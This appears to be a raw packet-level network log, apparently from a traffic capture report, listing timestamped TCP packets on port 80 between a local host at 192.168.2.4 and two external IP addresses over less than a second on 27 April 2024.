Apr 27, 2024 01:31:19.260200024 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.260270119 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.260312080 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.260349989 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.260385036 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.260420084 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.260453939 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.260493040 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.260518074 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.260545015 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.260576010 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.260621071 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.260643959 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.260674953 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.260700941 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.260747910 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.260766983 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.260797977 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.260823965 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.260863066 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.260888100 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.260919094 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.260943890 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.260982990 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.261006117 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.261032104 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.261060953 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.261110067 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.261127949 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.261156082 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.268496037 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.273148060 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.273195982 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.273288012 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.409266949 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.409413099 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.409476995 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.409516096 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.409540892 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.409555912 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.409584045 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.409595966 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.409635067 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.409637928 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.409673929 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.409712076 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.409749031 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.409770012 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.409787893 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.409794092 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.409826994 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.409863949 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.409900904 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.409915924 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.409948111 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.409957886 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.409998894 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.410034895 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.410073042 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.410082102 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.410111904 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.410119057 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.411590099 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.411633015 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.411672115 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.411684990 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.411710024 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.411745071 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.411783934 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.411820889 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.411859035 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.411871910 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.411904097 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.411911964 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.411941051 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.411978960 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.412017107 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.412024975 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.412055969 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.412061930 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.412096977 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.412625074 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.412643909 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.412683010 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.412722111 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.412770033 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.413098097 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.413137913 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.413139105 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.413321972 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.413361073 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.413398027 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.413419962 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.413436890 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.413443089 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.413508892 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.413548946 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.413587093 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.413625956 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.413636923 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.413660049 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.413664103 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.413703918 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.413711071 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.413743019 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.413816929 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.413855076 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.413876057 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.413896084 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.414690018 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.414726973 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.414763927 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.414802074 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.414827108 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.414853096 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.415107965 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.415148020 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.415189028 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.415226936 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.415230989 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.415268898 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.415268898 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.415307999 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.415344000 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.415383101 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.415384054 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.415424109 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.415441990 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.415462017 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.415498972 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.415535927 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.415575027 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.415591955 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.415615082 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.415636063 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.415653944 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.415693998 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.415714979 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.415731907 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.415734053 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.415771008 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.415810108 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.415847063 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.415854931 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.415888071 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.415893078 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.415936947 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.415982008 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.416018009 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.416029930 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.416057110 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.416055918 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.416095018 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.416147947 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.416243076 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.416254044 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.416284084 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.416285992 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.431469917 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.431510925 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.431550026 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.431587934 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.431621075 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.431655884 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.431678057 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.431715965 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.431737900 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.431777000 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.431792974 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.431828976 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.431853056 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.431885004 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.431910992 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.431947947 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.431972027 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.432008982 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.432027102 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.432064056 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.432085037 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.432133913 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.432173014 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.432212114 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.432234049 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.432260990 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.432287931 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.432332993 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.432348967 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.432383060 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.432405949 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.432452917 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.432468891 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.432502031 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.456001043 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.463298082 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.468530893 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.468573093 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.468641043 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.602637053 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.602678061 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.602715969 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.602752924 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.602777958 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.602818966 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.602843046 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.602880955 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.602901936 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.602930069 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.602958918 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.603033066 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.603068113 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.603106022 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.603127003 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.603161097 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.603183985 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.603230953 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.603245020 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.603297949 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.603315115 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.603352070 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.603377104 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.603408098 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.603432894 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.603470087 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.603493929 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.603528023 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.603548050 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.603595018 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.603626013 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.603646994 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.603681087 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 01:31:19.603738070 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 01:31:19.604137897 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.604173899 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.604212999 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.604250908 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.604255915 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.604295015 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.604322910 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.604361057 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.604397058 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.604441881 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.604469061 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.604511023 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.604511976 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.604548931 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.604587078 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.604636908 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.604726076 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.604763985 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.604764938 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.604835987 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.604873896 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.604887009 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.604945898 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.604983091 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.605021954 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.605026007 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.605060101 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.605061054 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.605628967 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.605667114 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.605715990 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.605762959 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.605808973 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.606035948 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.606205940 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.606245041 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.606281996 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.606287956 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.606323957 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.606328964 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.606396914 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.606436014 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.606472969 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.606477976 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.606511116 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.606513023 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.606618881 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.606688976 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.606725931 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.606728077 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.606765032 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.606767893 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.606805086 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.606843948 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.606897116 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.607048035 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.607094049 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.607409954 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.607449055 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.607544899 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.607589960 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.607933044 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.607984066 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.608234882 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.608329058 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.608367920 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.608405113 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.608418941 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.608444929 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.608447075 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.608483076 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.608521938 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.608558893 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.608563900 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.608597994 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.608597040 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.608637094 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.608685017 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.608927011 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.608966112 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.609004021 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.609041929 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.609045982 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.609080076 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.610506058 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.610546112 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.610585928 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.610625029 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.610630035 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.610665083 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.610697985 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.610737085 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.610775948 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.610814095 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.610822916 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.610851049 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.610852957 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.610892057 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.610929966 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.610965967 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 01:31:19.610974073 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 01:31:19.611004114 CEST	80	49734	176.97.76.106	192.168.2.4
